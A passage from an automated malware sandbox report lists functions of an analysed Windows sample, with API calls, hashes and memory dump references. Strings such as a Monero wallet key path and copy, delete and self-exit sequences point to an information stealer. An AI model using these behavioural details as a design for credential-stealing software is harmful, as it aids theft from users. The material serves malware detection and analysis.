                            • Opcode ID: e978466fdba715cf12920ce965c6811f9839d9bc557a1af63b0f7f9e74f90b31
                            • Instruction ID: edef2f829572832d9ef99f3ec6a0133c257cc87e1ccd2e2bac3a2baad55404a9
                            • Opcode Fuzzy Hash: e978466fdba715cf12920ce965c6811f9839d9bc557a1af63b0f7f9e74f90b31
                            • Instruction Fuzzy Hash: 5B01CC75500108FFCB08DFECC985EAE7BB9FB84364F148548F9499B345C675AA40DB91
                            Function 005F12A0 Relevance: 7.5, APIs: 5, Instructions: 39registrymemoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104), ref: 005F12B4
                            • RtlAllocateHeap.NTDLL(00000000), ref: 005F12BB
                            • RegOpenKeyExA.ADVAPI32(000000FF,?,00000000,00020119,?), ref: 005F12D7
                            • RegQueryValueExA.ADVAPI32(?,000000FF,00000000,00000000,?,000000FF), ref: 005F12F5
                            • RegCloseKey.ADVAPI32(?), ref: 005F12FF
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateCloseOpenProcessQueryValue
                            • String ID:
                            • API String ID: 3225020163-0
                            • Opcode ID: 8a7799a99951f4dc2257e7fdb7cd859b0b0e8173c3d7f7191b9d92fc3e2cafa0
                            • Instruction ID: fe9a3ead2b36395d2b8a965a9a27f63601764497e2e599a1480b0653f59f9717
                            • Opcode Fuzzy Hash: 8a7799a99951f4dc2257e7fdb7cd859b0b0e8173c3d7f7191b9d92fc3e2cafa0
                            • Instruction Fuzzy Hash: AB01E1B9A40208BBDB04DFE4DC89FAEB7B8FB88701F108559FA4597280D6759A058F51
                            Function 0060C84E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 129COMMONLIBRARYCODE
                            Download Yara Rule
                            APIs
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: String___crt$Type
                            • String ID:
                            • API String ID: 2109742289-3916222277
                            • Opcode ID: 21a5f02db6acc4431773051149c2c1f34a66dfa6b5d3adb543cc8a0a9d819653
                            • Instruction ID: 11bf737f15fdaf2f73408ad8b66682f54c6b923f355791c44271dfe90473c015
                            • Opcode Fuzzy Hash: 21a5f02db6acc4431773051149c2c1f34a66dfa6b5d3adb543cc8a0a9d819653
                            • Instruction Fuzzy Hash: 1D41377114074C5EDB298B24CC84FFB7BEA9F45314F1445ECE9CA861C2D2719A45CF24
                            Function 00606630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON
                            Download Yara Rule
                            APIs
                            • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00606663
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                            • ShellExecuteEx.SHELL32(0000003C), ref: 00606726
                            • ExitProcess.KERNEL32 ref: 00606755
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
                            • String ID: <
                            • API String ID: 1148417306-4251816714
                            • Opcode ID: 4428bb7faaf938af9edaaf7bb47dbfa30f7bf0aab13b74ab2169f914189c32fd
                            • Instruction ID: a84bab06177695f2246e4aa91e06f02087ac2cbb59a3eee8c64a4882a52c7690
                            • Opcode Fuzzy Hash: 4428bb7faaf938af9edaaf7bb47dbfa30f7bf0aab13b74ab2169f914189c32fd
                            • Instruction Fuzzy Hash: 893147B1941208AADB98EB94DC82FDEB779AF54300F404588F24A661D1DF746B48CF6A
                            Function 006087C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,00610E28,00000000,?), ref: 0060882F
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00608836
                            • wsprintfA.USER32 ref: 00608850
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesslstrcpywsprintf
                            • String ID: %dx%d
                            • API String ID: 1695172769-2206825331
                            • Opcode ID: 3b38d724920507cd3477015c69d87a9816e11c0e0a0689a1a35ab6cca14be271
                            • Instruction ID: 7e854ade7a8f7dc70ac432675cad7a0918681693e0460a2fe50319f293732252
                            • Opcode Fuzzy Hash: 3b38d724920507cd3477015c69d87a9816e11c0e0a0689a1a35ab6cca14be271
                            • Instruction Fuzzy Hash: 8D213DB1A40208AFDB08DFD4DD49FAEBBB8FB88701F104519F645A72C0C779A901CBA1
                            Function 00608D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON
                            Download Yara Rule
                            APIs
                            • GetProcessHeap.KERNEL32(00000000,000000FA,?,?,0060951E,00000000), ref: 00608D5B
                            • RtlAllocateHeap.NTDLL(00000000), ref: 00608D62
                            • wsprintfW.USER32 ref: 00608D78
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heap$AllocateProcesswsprintf
                            • String ID: %hs
                            • API String ID: 769748085-2783943728
                            • Opcode ID: e0768300aa1efc0d1a4d511124b3011df7aa1a3e0a4ca23ce1d7dc1c47a1b26e
                            • Instruction ID: d81c12f07253f543b5eeeca9c1c14c4f27f62b0532675ad8ba484067f42870e2
                            • Opcode Fuzzy Hash: e0768300aa1efc0d1a4d511124b3011df7aa1a3e0a4ca23ce1d7dc1c47a1b26e
                            • Instruction Fuzzy Hash: 96E08CB0A40208FBDB04DB94DC0EE69B7B8FB84702F0004A4FD4A87280DA719E008B92
                            Function 005FA260 Relevance: 6.4, APIs: 4, Instructions: 370filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FA2E1
                            • lstrlen.KERNEL32(00000000,00000000), ref: 005FA3FF
                            • lstrlen.KERNEL32(00000000), ref: 005FA6BC
                              • Part of subcall function 0060A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0060A7E6
                            • DeleteFileA.KERNEL32(00000000), ref: 005FA743
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 989418a60de2a7c18fa9ae2b942aa5828938ecf609fa8b34ad01132874ba61df
                            • Instruction ID: 8bf965652598bb41bb86c699fa80bdacb38e52c407f6d501aded5db3f09e874e
                            • Opcode Fuzzy Hash: 989418a60de2a7c18fa9ae2b942aa5828938ecf609fa8b34ad01132874ba61df
                            • Instruction Fuzzy Hash: 5DE10C729502089ADB4CEBE4DC92EEF733AAF64340F50855CF516720D1EF346A49CB6A
                            Function 005FD400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FD481
                            • lstrlen.KERNEL32(00000000), ref: 005FD698
                            • lstrlen.KERNEL32(00000000), ref: 005FD6AC
                            • DeleteFileA.KERNEL32(00000000), ref: 005FD72B
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: 184f6ad21d4d5b175266948276fe86c7590cc6a36b8a0d5ac22a3d8c44a88fc3
                            • Instruction ID: f72a0331156f864f5e69679e4e94c55633305ec2049a26f1c9c73aaece79b37c
                            • Opcode Fuzzy Hash: 184f6ad21d4d5b175266948276fe86c7590cc6a36b8a0d5ac22a3d8c44a88fc3
                            • Instruction Fuzzy Hash: EA911F719502089ADB4CEBE0DD96EEF733AAF54340F50856CF507A60D1EF346A09CB6A
                            Function 005FD780 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                            Download Yara Rule
                            APIs
                              • Part of subcall function 0060A740: lstrcpy.KERNEL32(00610E17,00000000), ref: 0060A788
                              • Part of subcall function 0060A9B0: lstrlen.KERNEL32(?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 0060A9C5
                              • Part of subcall function 0060A9B0: lstrcpy.KERNEL32(00000000), ref: 0060AA04
                              • Part of subcall function 0060A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0060AA12
                              • Part of subcall function 0060A8A0: lstrcpy.KERNEL32(?,00610E17), ref: 0060A905
                              • Part of subcall function 00608B60: GetSystemTime.KERNEL32(00610E1A,01409EE8,006105AE,?,?,005F13F9,?,0000001A,00610E1A,00000000,?,01408AA0,?,\Monero\wallet.keys,00610E17), ref: 00608B86
                              • Part of subcall function 0060A920: lstrcpy.KERNEL32(00000000,?), ref: 0060A972
                              • Part of subcall function 0060A920: lstrcat.KERNEL32(00000000), ref: 0060A982
                            • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 005FD801
                            • lstrlen.KERNEL32(00000000), ref: 005FD99F
                            • lstrlen.KERNEL32(00000000), ref: 005FD9B3
                            • DeleteFileA.KERNEL32(00000000), ref: 005FDA32
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                            • String ID:
                            • API String ID: 211194620-0
                            • Opcode ID: abc38cbb02c1aa08ff246989470e4a3986f406cf10a1c930b359b17e0d01bc5d
                            • Instruction ID: 7ff00ff2e51632b1d188b5f698d9cfc7f4617796a38087f546b7251911eb7569
                            • Opcode Fuzzy Hash: abc38cbb02c1aa08ff246989470e4a3986f406cf10a1c930b359b17e0d01bc5d
                            • Instruction Fuzzy Hash: E981ED719502089ADB4CEBE0DD96EEF733ABF54340F50851CF547A60D1EE346A09CB6A
                            Function 006070D0 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 140COMMON
                            Download Yara Rule
                            Strings
                            • 65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30, xrefs: 0060718C
                            • s`, xrefs: 00607111
                            • s`, xrefs: 006072AE, 00607179, 0060717C
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.00000000009DB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000ABE000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AE4000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AED000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.0000000000AFB000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066766624.0000000000AFC000.00000080.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066926682.0000000000CA2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066949840.0000000000CA3000.00000080.00000001.01000000.00000003.sdmpDownload File
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_5f0000_file.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy
                            • String ID: s`$s`$65 79 41 69 64 48 6C 77 49 6A 6F 67 49 6B 70 58 56 43 49 73 49 43 4A 68 62 47 63 69 4F 69 41 69 52 57 52 45 55 30 45 69 49 48 30
                            • API String ID: 3722407311-2599111893
                            • Opcode ID: 06f1366c992aeb6a76cb83e032d96d6ac7e216589874198058bfdcf8bf92ca31
                            • Instruction ID: ff79174e02625838fdef1e3da63ce3d96b0ea60f20ac1cb0fe67fd7b1ca13346
                            • Opcode Fuzzy Hash: 06f1366c992aeb6a76cb83e032d96d6ac7e216589874198058bfdcf8bf92ca31
                            • Instruction Fuzzy Hash: C9518EB0D842089BDB58EB90DC85BEEB776AF44304F1480ACE205762C1EB746E89CF59
                            Function 00603560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON
                            Download Yara Rule
                            Memory Dump Source
                            • Source File: 00000000.00000002.2064798922.00000000005F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 005F0000, based on PE: true
                            • Associated: 00000000.00000002.2064736713.00000000005F0000.00000004.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006A1000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.00000000006D2000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2064798922.000000000083A000.00000040.00000001.01000000.00000003.sdmpDownload File
                            • Associated: 00000000.00000002.2066102720.000000000084E000.00000040.00000001.01000000.00000003.sdmpDownload File
